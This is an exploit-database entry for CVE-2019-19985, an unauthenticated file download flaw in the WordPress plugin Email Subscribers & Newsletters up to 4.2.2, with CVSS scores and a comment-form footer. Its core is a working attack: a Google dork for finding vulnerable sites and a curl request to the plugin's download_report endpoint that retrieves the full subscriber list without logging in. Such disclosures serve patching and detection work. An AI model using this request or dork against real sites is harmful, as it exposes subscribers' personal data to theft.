WordPress Plugin Email Subscribers & Newsletters 4.2.2 Unauthenticated File Download

2020.08.07
Risk: Medium
Local: No
Remote: No
CWE: CWE-200


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download # Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt # Date: 2020-07-20 # Exploit Author: KBA@SOGETI_ESEC # Vendor Homepage: https://www.icegram.com/email-subscribers/ # Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2 # Version: <= 4.2.2 # Tested on: Email Subscribers & Newsletters 4.2.2 # CVE : CVE-2019-19985 ################################################################################################ # ___ ___ ___ ___ ___ # # /\ \ /\ \ /\ \ /\ \ /\ \ ___ # # /::\ \ /::\ \ /::\ \ /::\ \ \:\ \ /\ \ # # /:/\ \ \ /:/\:\ \ /:/\:\ \ /:/\:\ \ \:\ \ \:\ \ # # _\:\~\ \ \ /:/ \:\ \ /:/ \:\ \ /::\~\:\ \ /::\ \ /::\__\ # # /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/ # # \:\ \:\ \/__\:\ \ /:/ \:\ /\ \/__\:\~\:\ \/__/:/ \/__/\/:/ / # # \:\ \:\__\ \:\ /:/ / \:\ \:\__\ \:\ \:\__\/:/ / \::/__/ # # \:\/:/ / \:\/:/ / \:\/:/ / \:\ \/__/\/__/ \:\__\ # # \::/ / \::/ / \::/ / \:\__\ \/__/ # # \/__/ \/__/ \/__/ \/__/ # # ___ ___ ___ ___ # # /\ \ /\ \ /\ \ /\ \ # # /::\ \ /::\ \ /::\ \ /::\ \ # # EXPLOIT /:/\:\ \ /:/\ \ \ /:/\:\ \ /:/\:\ \ # # Email Subscribers & Newsletters <= 4.2.2 /::\~\:\ \ _\:\~\ \ \ /::\~\:\ \ /:/ \:\ \ # # Unauthenticated File Download /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ # # \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\ \ \/__/ # # \:\ \:\__\ \:\ \:\__\ \:\ \:\__\ \:\ \ # # \:\ \/__/ \:\/:/ / \:\ \/__/ \:\ \ # # \:\__\ \::/ / \:\__\ \:\__\ # # KBAZ \/__/ \/__/ \/__/ \/__/ # # # # # ################################################################################################ curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all' EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top